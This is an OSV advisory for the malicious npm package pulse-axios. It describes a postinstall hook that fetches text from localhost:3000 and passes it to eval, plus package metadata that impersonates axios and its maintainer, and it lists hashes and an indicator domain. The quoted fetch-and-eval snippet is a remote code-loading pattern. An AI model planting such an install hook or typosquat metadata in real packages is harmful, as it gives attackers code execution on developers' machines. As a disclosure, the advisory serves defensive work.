MAL-2026-4651

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pulse-axios/MAL-2026-4651.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4651

Published

2026-05-20T01:56:30Z

Modified

2026-05-26T06:02:52.481799152Z

Summary

Malicious code in pulse-axios (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99)

pulse-axios@1.16.1 declares a postinstall hook (node./lib/core/eval.js) that on npm install issues fetch('http://localhost:3000/download/data'), reads the response body as text, and passes it to eval inside an async IIFE: await eval(\(async () => {\n${datab2}\n})();`). Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time — including any local attacker process, a co-installed malicious package's helper, or a developer-staging payload server — execute with the installer's privileges. The package additionally impersonates the legitimateaxiospackage:name: pulse-axios, description claims to be "a faster and better version of axios",authoris set toMatt Zabriskie(the real axios maintainer),repository.urlpoints tohttps://github.com/axios/axios.git, andhomepageishttps://axios-http.com`. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-21T06:54:36Z",
            "versions": [
                "1.17.2"
            ],
            "sha256": "28257d4309df99e3d275ee13a8070e9be516444fc5a5e954c864cbf7d7b1f89c",
            "id": "IN-MAL-2026-003766",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:16.460920647Z"
        },
        {
            "modified_time": "2026-05-20T02:00:14Z",
            "versions": [
                "1.17.1"
            ],
            "sha256": "5697e55222985697b89b9d1755984516563ff0a30218ac331c34aee46f3f1d07",
            "id": "IN-MAL-2026-003389",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:32.977313736Z"
        },
        {
            "modified_time": "2026-05-21T06:54:36Z",
            "versions": [
                "1.17.2"
            ],
            "sha256": "a04cbfa8262f2b1fc518a4124a825108b1895b24e6222a1306c57c136aa180a7",
            "id": "IN-MAL-2026-003767",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:16.556905649Z"
        },
        {
            "modified_time": "2026-05-20T01:56:30Z",
            "versions": [
                "1.16.1"
            ],
            "sha256": "c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99",
            "id": "IN-MAL-2026-003385",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:32.522011889Z"
        },
        {
            "modified_time": "2026-05-20T02:00:14Z",
            "versions": [
                "1.17.1"
            ],
            "sha256": "d53e7eba89c2c1763024ac4b829f4f12f5e5f901a407c4fc7b157417aec557f1",
            "id": "IN-MAL-2026-003390",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:33.070727028Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / pulse-axios

Package

Name: pulse-axios; View open source insights on deps.dev
Purl: pkg:npm/pulse-axios

Affected ranges

Affected versions

1.*

1.16.1

1.17.1

1.17.2

Database specific

indicators

{
    "domains": [
        "consequences-faces-weblogs-clinical.trycloudflare.com"
    ],
    "evidence_files": [
        {
            "sha256": "ec84bb94f37b0021bcea38c9b1e5c326dda236d4e9c83bfc11093e597d23a9fe",
            "tlsh": "21e026aa303f26754f7123f89d57180ff722b31b76c4c1c5f39486048e326a14945e5d",
            "path": "lib/core/eval.js"
        },
        {
            "sha256": "19649e1b8bf32423969ba39b72913c934844eb6a991ddc1a0493a3a243706dc9",
            "tlsh": "b2d1ec73c9ca4d572fb47aa8a87a9264f231c30fa551c90fb07e024c4f7572f129762a",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-V65XeJl04Q9VAFB6bsNTktIN64Qiw/qc9LLj4m6UFRRUSzI+5eUP3s23lP8fXnwa8a2tsMToPZGCdq/sApsSig==",
                "sha1": "f81c5e006cfe568db6d2524dca71a86c859d392b"
            },
            "filename": "pulse-axios-1.17.2.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pulse-axios/MAL-2026-4651.json"